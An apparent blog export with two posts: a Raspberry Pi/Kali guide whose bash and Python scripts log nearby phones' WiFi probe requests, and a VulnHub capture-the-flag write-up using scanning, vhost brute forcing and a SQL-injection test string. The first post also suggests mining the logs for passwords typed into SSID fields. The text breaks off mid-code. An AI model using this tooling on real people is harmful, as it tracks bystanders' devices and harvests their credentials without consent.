A day with Tape: RPI & WiFi probes (2019-02-18)<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<br />
<b>HARDWARE:</b><br />
- RPI3 B+<br />
- HDMI cable for connection to monitor during initial setup<br />
- USB keyboard for initial setup<br />
- USB mouse for initial setup<br />
- 16GB MicroSD card and adapter for Kali image installation<br />
- Wireless dongle<br />
<br />
<b>INSTALLATION & PREPARATION FOR A HEADLESS (NO KEYBOARD/NO MONITOR) SETUP</b><br />
1. Download the Kali image for the Raspberry Pi<br />
<a href="https://www.offensive-security.com/kali-linux-arm-images/">https://www.offensive-security.com/kali-linux-arm-images/</a><br />
<a href="https://images.offensive-security.com/arm-images/kali-linux-2018.4-rpi3-nexmon.img.xz">https://images.offensive-security.com/arm-images/kali-linux-2018.4-rpi3-nexmon.img.xz</a><br />
Validate the hash of the downloaded image.<br />
<br />
2. Flash the Kali image onto the MicroSD card using a tool such as Etcher<br />
<a href="https://www.balena.io/etcher/">https://www.balena.io/etcher/</a><br />
<div>
<br />
3. Edit the default password<br />
- Log in with the default root:toor username/password.<br />
- In console enter '<span style="color: lime;">passwd</span>'<br />
- Enter your new password and confirm by entering a second time.<br />
<br />
4. Edit the SSH host keys<br />
All ARM images are pre-configured with the same keys, so it's imperative to edit the SSH keys.<br />
<span style="color: lime;">update-rc.d -f ssh remove</span><br />
<span style="color: lime;">update-rc.d -f ssh defaults</span><br />
<span style="color: lime;">cd /etc/ssh/</span><br />
<span style="color: lime;">mkdir insecure_old</span><br />
<span style="color: lime;">mv ssh_host_* insecure_old</span><br />
<span style="color: lime;">dpkg-reconfigure openssh-server</span><br />
<span style="color: lime;">service ssh restart</span><br />
<br />
5. Allow autologin, as it will be running as a headless unit and being plugged in and out a bit.<br />
- Edit file (uncomment 2 lines) /etc/lightdm/lightdm.conf<br />
<span style="color: lime;">autologin-user=root<br />autologin-user-timeout=0</span><br />
<br />
- Edit file (comment out a line) /etc/pam.d/lightdm-autologin<br />
<span style="color: lime;">#auth required pam_succeed_if.so user != root quiet_success</span><br />
<br />
<br />
<div>
6. reboot to test if all working OK, the device should boot straight into desktop!</div>
<div>
!NB </div>
<div>
I did try updating/upgrading the system and it fubarred the system, requiring a full reinstall.</div>
<div>
So for this project no other tools or upgrades were installed.</div>
<div>
<br /></div>
<div>
<div>
<br /></div>
<div>
So now the RPI is set up, all that remains is to plug in the WiFi dongle and put a few scripts on the RPI to assist in the logging and viewing of WiFi probes.</div>
<div>
<br />
Before setting up the scripts, I first prepared a working directory;<br />
<span style="color: lime;">mkdir /root/probemon</span><br />
<br />
and then download an oui.txt file to the RPI to show vendor information for MAC addresses where it is available; either the sanitized version or the original will do;<br />
<div>
<a href="https://linuxnet.ca/ieee/oui.txt">https://linuxnet.ca/ieee/oui.txt</a></div>
<div>
<a href="http://standards-oui.ieee.org/oui.txt">http://standards-oui.ieee.org/oui.txt</a></div>
<span style="color: lime;">wget https://linuxnet.ca/ieee/oui.txt -O /root/probemon/oui.txt</span><br />
<div>
<br /></div>
<br />
The idea runs off 3 scripts; </div>
<div>
<b>1) probemon.sh</b><br />
The main script: it monitors for WiFi probes, moves the working file to a dated backup after it reaches a certain size and logs restarts of the script.<br />
<br />
<blockquote class="tr_bq">
<pre><span style="color: lime;">#!/usr/bin/bash
DIR="/root/probemon/" # Directory for the working file and logs
PROBELOG=probemon.txt # Working file logging WiFi probes
STARTLOG=monlog.txt # File logging script start times and backup creation
#
#
# Identify which wlan interface has no IPv4 address and is therefore free for monitor mode.
# grep -w keeps "inet" from also matching the "inet6" link-local line.
IFACE=""
for i in $(/usr/sbin/ifconfig | grep wlan | sed 's/:.*$//g'); do
 INET=$(/usr/sbin/ifconfig "$i" | grep -w inet)
 if [ "$INET" == "" ] ; then IFACE=$i ; break ; fi
done
if [ "$IFACE" == "" ] ; then
 echo "no free wlan interface found -- $(date +%F_%T)" >> "$DIR$STARTLOG"
 exit 1
fi
#
#
DATE=$(date +%F_%T) # Current date in human readable format
SIZE=$(stat -c %s "$DIR$PROBELOG" 2>/dev/null) # Working file size (empty on first run)
SIZE=${SIZE:-0}
BKUP="$DATE"_"$PROBELOG" # Dated backup filename
#
# Check size of working file, if over 2MB move to backup file.
if (($SIZE > 2000000)) ; then
 mv "$DIR$PROBELOG" "$DIR$BKUP"
 # Create entry of backup file created in log.
 echo "moved log $PROBELOG to $BKUP" >> "$DIR$STARTLOG"
fi
#
/usr/sbin/ifconfig "$IFACE" down
/usr/sbin/iwconfig "$IFACE" mode monitor
/usr/sbin/ifconfig "$IFACE" up
#
#
echo -ne "started with $IFACE -- " >> "$DIR$STARTLOG" && date +%F_%T >> "$DIR$STARTLOG"
#
# Log every probe request: epoch time, source MAC, signal strength and SSID, double quoted and tab separated.
tshark -i "$IFACE" -n -l -f "subtype probereq" -T fields -e frame.time_epoch -e wlan.sa -e radiotap.dbm_antsignal -e wlan.ssid -E quote=d 2> /dev/null >> "$DIR$PROBELOG"</span></pre></blockquote>
<br />
<b>2) moncheck.sh</b><br />
A very basic script which I saved to /etc/cron.hourly/ and which is called by a cronjob every minute to check whether probemon.sh is running and, if not, to restart it.<br />
<blockquote class="tr_bq">
<pre><span style="color: lime;">#!/usr/bin/bash
#
# The [p] in the pattern stops grep from matching its own command line.
RUNNING=$(ps aux | grep '[p]robemon.sh')
#
if [ "$RUNNING" == "" ] ; then
 /usr/bin/bash /root/scripts/probemon.sh
fi</span></pre></blockquote>
Make sure the script is executable;<br />
<blockquote class="tr_bq">
<span style="color: lime;">chmod 755 /etc/cron.hourly/moncheck.sh</span></blockquote>
<br />
and then make a crontab entry;<br />
<blockquote class="tr_bq">
<span style="color: lime;">crontab -e</span></blockquote>
<blockquote class="tr_bq">
<span style="color: lime;">*/1 * * * * /etc/cron.hourly/moncheck.sh</span></blockquote>
<br />
<b>3) liveparse.sh</b><br />
A script that parses information piped to it, makes the date human readable, looks up vendor information and allows filtering with a whitelist, a blacklist or no filter.<br />
whitelist.txt / blacklist.txt are text files with one MAC address per line.<br />
<blockquote class="tr_bq">
<pre><span style="color: lime;">#!/bin/bash
#liveparse.sh #Script to pipe info into.
# Input lines are as written by tshark -E quote=d: tab separated, double quoted fields: epoch, mac, dbm, ssid
HOMEDIR="/root/probemon/" #specify home directory
OUI="$HOMEDIR"oui.txt
WHITE="$HOMEDIR"whitelist.txt
BLACK="$HOMEDIR"blacklist.txt
BLACKLIST=false
WHITELIST=false
SIMPLE=false
#
#
if [ ! -f "$OUI" ] ; then
 OUI=$(locate oui.txt | head -n 1) #Find a file with oui information
fi
#
# Vendor lookup: first 3 octets against the "(base 16)" lines of oui.txt
f_vendor() {
 local MACB16 MACOUI
 MACB16=$(echo "$1" | sed 's/://g' | cut -c 1-6)
 MACOUI=$(grep -i "^$MACB16 *(base 16)" "$OUI" | sed -e 's/^.*(base 16)//' -e 's/[ \t]*//')
 if [[ "$MACOUI" == "" ]] ; then
 MACOUI="No Info"
 fi
 echo "$MACOUI"
}
#
# Print one line: human readable date, MAC, signal, SSID, vendor
f_print() {
 local line="$1"
 DT=$(echo "$line" | cut -d \" -f 2)
 DATE=$(date -d @"$DT" +%F_%T)
 MAC=$(echo "$line" | cut -d \" -f 4)
 PWR=$(echo "$line" | cut -d \" -f 6)
 SSID=$(echo "$line" | cut -d \" -f 8)
 printf '%-22s %-20s %-8s %-15s %-10s\n' "$DATE" "$MAC" "$PWR" "$SSID" "$(f_vendor "$MAC")"
}
#
# Blacklist: only show MACs that are listed in blacklist.txt
f_blacklist() {
while read -r line ; do
 MAC=$(echo "$line" | cut -d \" -f 4)
 if [ -n "$MAC" ] && grep -qi "$MAC" "$BLACK" ; then
 f_print "$line"
 fi
done
}
#
# Whitelist: hide MACs that are listed in whitelist.txt
f_whitelist() {
while read -r line ; do
 MAC=$(echo "$line" | cut -d \" -f 4)
 if [ -n "$MAC" ] && ! grep -qi "$MAC" "$WHITE" ; then
 f_print "$line"
 fi
done
}
#
# Simple: no filter
f_simple() {
while read -r line ; do
 f_print "$line"
done
}
#
# OPTION FUNCTIONS
########################################################################
while getopts ":bsw" opt; do
 case $opt in
 b) BLACKLIST=true ;;
 s) SIMPLE=true ;;
 w) WHITELIST=true ;;
 esac
done
#
if [ $# -eq 0 ] ; then
 f_simple
elif [ $SIMPLE == true ] ; then
 f_simple
elif [ $BLACKLIST == true ] ; then
 f_blacklist
elif [ $WHITELIST == true ] ; then
 f_whitelist
fi
#</span></pre></blockquote>
<br />
<br /></div>
</div>
Some one-liners as examples;<br />
<br />
View the logfile as it is written, without a whitelist filter.<br />
<span style="color: lime;">tail -f probemon/probemon.txt | bash scripts/liveparse.sh</span><br />
with whitelist filter;<br />
<span style="color: lime;">tail -f probemon/probemon.txt | bash scripts/liveparse.sh -w</span><br />
<br />
Check when certain MAC addresses were in the vicinity;<br />
<span style="color: lime;">grep -i &lt;partial mac&gt; logfile.txt | bash scripts/liveparse.sh</span><br />
<br />
Concatenating all log files into one large file and then doing some grepping can reveal interesting information.<br />
<br />
For instance, to see whether someone may have accidentally entered a password into the SSID field of a device, you could sort all the SSIDs and see whether any look like they may actually be a password;<br />
<span style="color: lime;">cut -d \" -f 8 logfile.txt | sort -u</span><br />
<br />
On finding a likely candidate, you can then grep the file for the MAC address and see what other SSIDs are associated with that MAC address.<br />
Chances are the possible password will be for one of the SSIDs also being broadcasted.<br />
Sites like wigle.net will even show you locations of SSIDs.<br />
<br />
See which SSIDs are being broadcast by which MAC addresses.<br />
This will quickly show if a portable appliance is broadcasting multiple SSIDs.<br />
Note that some portable appliances now broadcast random MAC addresses.<br />
<span style="color: lime;">cut -d \" -f 4,8 --output-delimiter=$'\t' logfile.txt | sort -u</span><br />
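To show what the one-liners above and liveparse.sh are digging for in one place, here is an added Python example (not part of the original post or its scripts) that parses probemon.txt lines as written by the tshark command above, looks up the vendor from oui.txt, groups the SSIDs each MAC probed for and flags locally administered (randomised) MACs. SAMPLE_LOG and SAMPLE_OUI are constructed samples embedded so it runs offline.

```python
"""Summarise a probemon.txt log: SSIDs per source MAC, vendor from oui.txt,
and whether the MAC looks randomised (locally administered bit set)."""
import csv
import io
import re

# Constructed sample in the layout tshark writes with -T fields -E quote=d:
# tab separated, double quoted fields: epoch, source MAC, signal dBm, SSID.
SAMPLE_LOG = (
    '"1550000000.101"\t"00:00:0c:11:22:33"\t"-61"\t"HomeNet"\n'
    '"1550000001.202"\t"00:00:0c:11:22:33"\t"-58"\t"CoffeeShop"\n'
    '"1550000002.303"\t"da:a1:19:44:55:66"\t"-70"\t""\n'
    '"1550000003.404"\t"da:a1:19:44:55:66"\t"-72"\t"HomeNet"\n'
    '"1550000004.505"\t"00:00:0c:aa:bb:cc"\t"-80"\t"hunter2"\n'
)

# Constructed excerpt in the layout of the IEEE oui.txt file; only the
# "(base 16)" lines carry the prefix-to-vendor mapping that is needed.
SAMPLE_OUI = (
    "00-00-0C   (hex)\t\tCisco Systems, Inc\n"
    "00000C     (base 16)\t\tCisco Systems, Inc\n"
    "\n"
)

OUI_LINE = re.compile(r"^([0-9A-F]{6})\s+\(base 16\)\s+(.+?)\s*$", re.I | re.M)


def load_oui(text):
    """Map a 6-hex-digit prefix (upper case) to its vendor name."""
    return {m.group(1).upper(): m.group(2) for m in OUI_LINE.finditer(text)}


def is_locally_administered(mac):
    """True when bit 1 of the first octet is set: a locally administered
    address, which is what randomised client MACs look like."""
    first_octet = int(mac.split(":")[0], 16)
    return bool(first_octet & 0x02)


def parse_probe_lines(text):
    """Yield (epoch, mac, dbm, ssid) tuples; malformed lines are skipped."""
    for row in csv.reader(io.StringIO(text), delimiter="\t", quotechar='"'):
        if len(row) != 4:
            continue
        epoch, mac, dbm, ssid = row
        try:
            yield float(epoch), mac.lower(), int(dbm), ssid
        except ValueError:
            continue


def summarise(log_text, oui):
    """Per MAC: vendor, randomised flag, sorted SSIDs probed for, probe count,
    first and last time seen (epoch)."""
    per_mac = {}
    for epoch, mac, dbm, ssid in parse_probe_lines(log_text):
        entry = per_mac.setdefault(mac, {
            # a vendor lookup on a randomised MAC is meaningless, so it stays "No Info"
            "vendor": oui.get(mac.replace(":", "").upper()[:6], "No Info"),
            "random": is_locally_administered(mac),
            "ssids": set(),
            "probes": 0,
            "first_seen": epoch,
            "last_seen": epoch,
        })
        entry["probes"] += 1
        entry["first_seen"] = min(entry["first_seen"], epoch)
        entry["last_seen"] = max(entry["last_seen"], epoch)
        if ssid:  # "" is a wildcard probe request, not an SSID the device knows
            entry["ssids"].add(ssid)
    for entry in per_mac.values():
        entry["ssids"] = sorted(entry["ssids"])
    return per_mac


def main():
    summary = summarise(SAMPLE_LOG, load_oui(SAMPLE_OUI))
    for mac, e in sorted(summary.items()):
        kind = "random" if e["random"] else "global"
        print(f'{mac}  {kind:6}  {e["vendor"]:20}  {", ".join(e["ssids"])}')


if __name__ == "__main__":
    main()
```

Feed it a real log with `summarise(open("/root/probemon/probemon.txt").read(), load_oui(open("/root/probemon/oui.txt").read()))`; a MAC probing for many SSIDs is the pattern the last one-liner above is looking for.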
<br />
<br />
Although this is all old as dirt, it's still interesting.<br />
The accidental password entry was what really surprised me as it appears to be more common than I would have imagined.<br />
<br />
<br />
<br /></div>
</div>
VulnHub -- D0Not5top -- Writeup (2017-04-26)<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<b><br /></b>
<b>Trying not to stop with D0Not5top.. </b><br />
This was a wild ride indeed! Excellent fun 3mrgnc3, job well done indeed :)<br />
<br />
Was playing this together with a couple of THS buds and we were having a blast at being frustrated to high hell and back by this thing.. never did get all flags, but the path to root was a fun one and will look forward to seeing how others managed to get what we did not.<br />
<br />
<i><span style="font-size: x-small;">There are 2 IPs used in the below examples for the VM as I was switching between host-only and bridged.</span></i><br />
<br />
<span style="font-size: large;"><i><b>Initial enumeration</b></i></span><br />
======================<br />
Started off with the usual scans;<br />
> <i>Host discovery</i><br />
> <i>Port scanning</i><br />
> <i>Open port services checks</i><br />
> <i>Forced browsing</i><br />
> <i>Website source info gathering</i><br />
<br />
<b><u>Host discovery</u></b><br />
<span style="color: lime;">arp-scan 192.168.56.0/24</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/host_discovery_zpsc1dcvw7z.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="188" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/host_discovery_zpsc1dcvw7z.png" width="640" /></a></div>
<b><u>Port scanning</u></b><br />
<span style="color: lime;">nmap -p- 192.168.56.102</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/nmap_1_zpsjx1nogao.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="346" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/nmap_1_zpsjx1nogao.png" width="640" /></a></div>
So we have some ports to look at; ssh, smtp & http stand out as good ones to focus on (I'll admit I went digging at the rpc ports when all else was looking a tad bleak.. lol).<br />
<br />
<b>Port 22 SSH </b><br />
I decided to wait with further checks on SSH until more enumeration had been done and possible usernames enumerated. <i><span style="font-size: x-small;">More on this later...</span></i><br />
<br />
<b>Port 25 SMTP </b><br />
Doing a banner grab on the smtp port gives us an interesting string;<br />
<span style="color: lime;">nc 192.168.56.102 25</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/nc_smtp_zpsuakkoyii.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="102" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/nc_smtp_zpsuakkoyii.png" width="640" /></a></div>
Decoding with xxd gives us another flag! yay!<br />
<span style="color: lime;">echo "46 4c 34 36 5f 33 3a 32 396472796 63637756 8656874 327231646434 717070756 5793437 347 3767879610a" | xxd -r -ps</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/smtp_hex_zpske7o4qcn.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="154" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/smtp_hex_zpske7o4qcn.png" width="640" /></a></div>
Hrmmph.. flag 3.. missed a couple.. search continues.<br />
<br />
<b>Port 80 HTTP </b><br />
Oh dear Xenu, the leetspeek continues...<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/http_80_zpsti6nnoms.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="200" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/http_80_zpsti6nnoms.png" width="640" /></a></div>
Nothing in the source of the page root, so time to bust out nikto to have a closer look at what might be lurking;<br />
<span style="color: lime;">nikto -h 192.168.56.102</span><br />
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/nikto_zpsbss4lmcy.png" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" height="464" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/nikto_zpsbss4lmcy.png" width="640" /></a><br />
<br />
after an initial AHAH! WordPress! moment of joy, happiness quickly turns to disappointment when it becomes apparent that the wordpress references are all blank page tr0lls.. bah..<br />
<br />
Checking the robots.txt we see some interesting information at the bottom of the robots.txt;<br />
<span style="color: lime;">curl 192.168.56.102/robots.txt</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/robots_zpstzw2ncez.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="610" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/robots_zpstzw2ncez.png" width="640" /></a></div>
# terminal knows where to go.<br />
User-agent: GameTerminal<br />
<br />
Alrighty then.. so terminal knows where to go and User-Agent is GameTerminal..<br />
Tried with setting the user agent to GameTerminal for shits and giggles, but that did not aid in any process.<br />
<br />
OK, next step to have a see if forced browsing can reveal any 'hidden' pages;<br />
<br />
<b><u>Forced Browsing</u></b><br />
Running dirb (dirb http://192.168.56.102) gives a lot of hits and so I switch to wfuzz to be able to better sort the output.<br />
<span style="color: lime;">wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 404 192.168.56.102/FUZZ</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wfuzz_1_zpsvbjjvafu.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="484" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/wfuzz_1_zpsvbjjvafu.png" width="640" /></a></div>
Still a lot of hits with a lot of empty pages.. but changing the syntax just a tad to only show HTTP 200 codes and recurse down 3 directories gives a clearer view of the non-empty pages;<br />
<span style="color: lime;">wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt -R 3 --sc 200 192.168.56.102/FUZZ</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wfuzz_2_zpsimv7smgz.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="510" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/wfuzz_2_zpsimv7smgz.png" width="640" /></a></div>
We find a page in the <i><b>/control/</b></i> directory in which a 'DNS Control Panel' is illustrated.<br />
MegustaAdmin is shown to be logged in, so note this as a possible username.<br />
Going through the page source of the /control page, we find another flag!<br />
<!-- FL46_1:urh8fu3i039rfoy254sx2xtrs5wc6767w --><br />
Going down a bit further and we have some text;<br />
<i><span style="color: yellow;"><!-- M3gusta said he hasn't had time to get this w0rKING. <br />Don't think he's quite in the 20n3 these days since his MadBro made that 7r4n5f3r, Just Couldnt H@cxk Da D0Not5topMe.ctf --!> </span></i><br />
Another possible username noted and looking further we find that the directory <i><b>/control/js/</b></i> is listable and see a README.MadBro file lurking..;<br />
<pre><span style="color: yellow;">###########################################################
# MadBro MadBro MadBro MadBro MadBro MadBro MadBro MadBro #
# M4K3 5UR3 2 S3TUP Y0UR /3TC/H05T5 N3XT T1M3 L0053R... #
# 1T'5 D0Not5topMe.ctf !!!! #
# 1M 00T4 H33R.. #
# MadBro MadBro MadBro MadBro MadBro MadBro MadBro MadBro #
###########################################################
FL101110_10:111101011101
1r101010q10svdfsxk1001i1
11ry100f10srtr1100010h10</span></pre>
<br />
Aha! So we need to edit the hosts file and include the domain D0Not5topMe with domain extension .ctf AND we have found flag #2!<br />
<pre><span style="color: yellow;">FL101110_10:111101011101</span></pre>
This string is partially binary; decoding the binary parts to decimal gives;<br />
FL46_2:3933<br />
Or, taking the 2nd part 6 chars at a time;<br />
FL46_2:6129<br />
Either way, it doesn't seem to hint at anything else.<br />
<pre><span style="color: yellow;">1r101010q10svdfsxk1001i1
11ry100f10srtr1100010h10</span></pre>
<div>
These strings underneath the partial binary appear to be Crypt16 hashes, but after trying all sorts of various string alterations and decodings, did not dig further on this.</div>
<b><span style="font-size: large;"><i>Checking domains</i></span></b><br />
======================<br />
<b><u>D0Not5topMe.ctf</u></b><br />
OK, so after editing the /etc/hosts file to include D0Not5topMe.ctf and pointing our browser to that domain, we are presented with a board / forum named "Worka Suko Gameo Di Besto"<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/forum_zpsqtltu1th.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="456" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/forum_zpsqtltu1th.png" width="640" /></a></div>
Further description of the forum appears to be Pig Latin;<br />
<i>"<span style="color: yellow;">emay ayingplay uchmay amesgay ownay egistrarioray arnay edsay emay emailway ayay egustomay otay indfay away eomay ideyhohay</span>"</i><br />
Which, as far as google can tell me, translates roughly to;<br />
<i>"<span style="color: yellow;">me playing much games now registrario rna sed me wemail a megusto to find wa meo hideyho</span>"</i><br />
OK, so it appears it is advising to register to the board and send an email to megusto to find out where he is hiding...<br />
<br />
Further we can see that Megusta is the only current member of the board and trying to login with;<br />
<i>username: megusta</i><br />
<i>password: megusta</i><br />
gives us a response of incorrect password.<br />
Trying to login with;<br />
<i>username: m3gu5t4</i><br />
<i>password: m3gu5t4</i><br />
gives us a response of incorrect username, so we can enumerate usernames, but I was not able to do more than that.<br />
<br />
After registering an account (<i>needed to be online for that, hence the bridged IP</i>) we are able to add Megusta as a friend, further confirming the valid username, however I couldn't figure out how to send a message to Megusta which is what I think the PigLatin translation is advising to do.. ¯\_(ツ)_/¯<br />
<br />
Spent a lot of time on the User Control Panel as it seemed the right place to be for an SQLi, LFI or RFI... but I now have a feeling it was one big tr0ll.. oh les tr0lls..<br />
<br />
When forcing an error with an attempted sql injection (http://d0not5topme.ctf/ucp.php?sid=0ea605a35c24e11610ecc7ee1aebe621&i=%27%20or%20%271=%271) we get a response mentioning an email address for Megusta; Megusta@g4m35.ctf<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/general_error_zps9qad5ekq.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="264" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/general_error_zps9qad5ekq.png" width="640" /></a></div>
Spent too long trying to use this information to see how it may help in sending a message to dear old Megusta.. however to no avail.<br />
<br />
So is it another valid new domain? Entered in hosts file and fired it up in browser.. Oh yeah!<br />
<br />
<b><u>g4m35.ctf</u></b><br />
This turns out to be a stress / fury / homicidal tendency inducing 3d missile game.. which I have found I am very, very bad at..<br />
I had a shot (ha) at trying to hack the game to see if anything appears at the end, as it must have a hint somewhere.. but failed miserably..<br />
<br />
Then luckily chron1cl3 came to the rescue: he had come up with a nice novel way of testing possible domains, based on enumerated names and leetified strings from the hints in robots.txt, and had found another domain!<br />
<br />
Comparing the response sizes from a curl --header Host request, we can see whether responses are new domains or non-existing domains which revert back to the webroot;<br />
<span style="color: lime;">curl -s --header "Host: test.ctf" 192.168.1.144</span><br />
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/domain_test01_zpsoreviesn.png" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" height="290" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/domain_test01_zpsoreviesn.png" width="640" /></a><br />
<br />
Using this and knowing that .ctf is a valid domain extension, we can do a rudimentary scan of possible domains with curl;<br />
<div>
<span style="color: lime;">for i in $(cat leet.txt);do echo -ne "$i -- " && curl -s --header "Host: $i.ctf" 192.168.1.144 | wc -c ; done</span></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/DOMAIN_TEST2_zpsxnx40yqv.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="256" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/DOMAIN_TEST2_zpsxnx40yqv.png" width="640" /></a></div>
AhYiss!</div>
t3rm1n4l.ctf has a different response size and appears to be a valid domain, so let's enter it in the hosts file and see what we're looking at.<br />
<br />
Mkay. A terminal emulator requiring some form of authentication.<br />
After a lot of trial and error found the correct Passwordo: t3rm1n4l.ctf <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/terminal_01_zpsf9wkio0q.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="352" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/terminal_01_zpsf9wkio0q.png" width="640" /></a></div>
Checking what commands the terminal emulator accepts shows that it is very limited. After going through numerous checks and getting rather frustrated with the constant renewed login requirement (omg 3mrgnc3.. teh tr0lls..), Pimp chron1cl3 found that grep worked and was able to do a file / dir listing with grep *<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/terminal_02_zpsi7tzvize.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="352" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/terminal_02_zpsi7tzvize.png" width="640" /></a></div>
Oooh yeeeah...<br />
<br />
So checking this new domain M36u574.ctf with the curl --header Host method, we see that the response is different from the webroot, so looks like another new domain!<br />
<span style="color: lime;">curl -s --header "Host: M36u574.ctf" 192.168.1.144 | wc -c</span><br />
<br />
Entering the new domain into our hosts file and viewing in browser, we are presented with a load of megusta memes on rotation stretching the full size of the browser for Meg's beauty's sake..<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/megustameg_zpsxv41ef8k.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/megustameg_zpsxv41ef8k.jpg" width="320" /></a></div>
<br />
<br />
I wanted to grab all pics and the directory wasn't listable, so to ensure I didn't miss anything I fired up OWASP ZAP and switched the proxy on in the browser (I use the Proxy Switcher add-on in the browser).<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/zap_zpssh1qbcmo.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="388" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/zap_zpssh1qbcmo.png" width="640" /></a></div>
After loading up the M36u574.ctf site and letting it run for a bit, I had all the images and proceeded to download the raw body of the response from ZAP for further analysis.<br />
<br />
Some quick checks on the image files with file, exiftool & hd shows that kingmegusta.jpg is of interest as there appears to be some base64 in the image comment.<br />
<span style="color: lime;">for i in $(ls *.raw); do echo ; exiftool $i ; done</span><br />
<br />
For the sake of covering our bases I also ran a quick check on the footers of the files to see if anything was pasted on the end of the files or anything out of the ordinary; besides padding and an actual png file instead of a jpeg, nothing noteworthy was found.<br />
<span style="color: lime;">for i in $(ls *.raw) ; do echo $i; hd $i | tail -n10; done</span><br />
<br />
So back to the suspected base64 in the comment of kingmegusta..<br />
<span style="color: lime;">exiftool -comment kingmegusta.raw | sed 's/^.*: //' | base64 -d</span><br />
<div>
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/hash_01_zpsxnjkaz6u.png" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" height="136" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/hash_01_zpsxnjkaz6u.png" width="640" /></a></div>
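As an added example (not from the original post), here is a small Python scanner that walks the JPEG marker segments itself, pulls out the COM (0xFFFE) comment segment that exiftool is reporting above, and base64-decodes it when it looks like base64. The embedded JPEG and the hidden string are constructed for the demo, not the CTF file.

```python
import base64
import binascii
import re
import struct

# JPEG marker codes (the byte that follows 0xFF)
SOI, EOI, SOS, COM = 0xD8, 0xD9, 0xDA, 0xFE
# Base64 alphabet plus optional '=' padding; whitespace is tolerated and stripped
B64_RE = re.compile(rb"^[A-Za-z0-9+/\s]+={0,2}$")


def jpeg_segments(data):
    """Yield (marker, payload) for every length-prefixed segment before SOS."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError("expected a marker at offset %d" % pos)
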